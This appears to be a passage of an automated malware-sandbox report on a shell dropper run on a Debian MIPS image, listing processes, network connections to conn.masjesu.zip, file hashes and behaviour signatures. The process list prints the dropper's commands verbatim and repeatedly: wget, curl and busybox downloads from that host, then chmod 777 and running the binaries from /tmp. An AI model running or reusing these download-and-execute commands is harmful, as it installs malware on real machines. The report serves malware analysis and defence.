[./r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/bin/rm

[rm r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/bin/chmod

[chmod 777 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17

[./4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/bin/rm

[rm 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/bin/chmod

[chmod 777 tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq

[./tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/bin/rm

[rm tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/bin/chmod

[chmod 777 xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr

[./xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/bin/rm

[rm xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/bin/chmod

[chmod 777 ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ

[./ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/bin/rm

[rm ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/bin/chmod

[chmod 777 p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX

[./p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/bin/rm

[rm p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/bin/chmod

[chmod 777 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08

[./7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/bin/rm

[rm 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/bin/chmod

[chmod 777 e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE

[./e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/bin/rm

[rm e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/bin/chmod

[chmod 777 upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27

[./upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/bin/rm

[rm upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/bin/chmod

[chmod 777 kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB

[./kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/bin/rm

[rm kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/bin/chmod

[chmod 777 X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl

[./X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/bin/rm

[rm X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/bin/chmod

[chmod 777 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J

[./7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/bin/rm

[rm 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-21 01:27

Reported

2024-10-21 01:29

Platform

debian9-mipsel-20240611-en

Max time kernel

129s

Max time network

132s

Command Line

[/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 N/A
N/A /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB N/A
N/A /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl N/A
N/A /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J N/A
N/A /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE N/A
N/A /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj N/A
N/A /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg N/A
N/A /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 N/A
N/A /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq N/A
N/A /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 N/A
N/A /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr N/A
N/A /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ N/A
N/A /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX N/A
N/A /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 N/A
N/A /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 N/A
N/A /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj N/A
N/A /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg N/A
N/A /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 N/A
N/A /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq N/A
N/A /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr N/A
N/A /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ N/A
N/A /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX N/A
N/A /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 N/A
N/A /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE N/A
N/A /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 N/A
N/A /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB N/A
N/A /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl N/A
N/A /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 /usr/bin/curl N/A
File opened for modification /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ /usr/bin/curl N/A
File opened for modification /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 /usr/bin/curl N/A
File opened for modification /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr /usr/bin/curl N/A
File opened for modification /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj /usr/bin/curl N/A
File opened for modification /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 /usr/bin/curl N/A
File opened for modification /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB /usr/bin/curl N/A
File opened for modification /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 /usr/bin/curl N/A
File opened for modification /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr /usr/bin/curl N/A
File opened for modification /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg /usr/bin/curl N/A
File opened for modification /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX /usr/bin/curl N/A
File opened for modification /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE /usr/bin/curl N/A
File opened for modification /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB /usr/bin/curl N/A
File opened for modification /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J /usr/bin/curl N/A
File opened for modification /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 /usr/bin/curl N/A
File opened for modification /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg /usr/bin/curl N/A
File opened for modification /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq /usr/bin/curl N/A
File opened for modification /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 /usr/bin/curl N/A
File opened for modification /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX /usr/bin/curl N/A
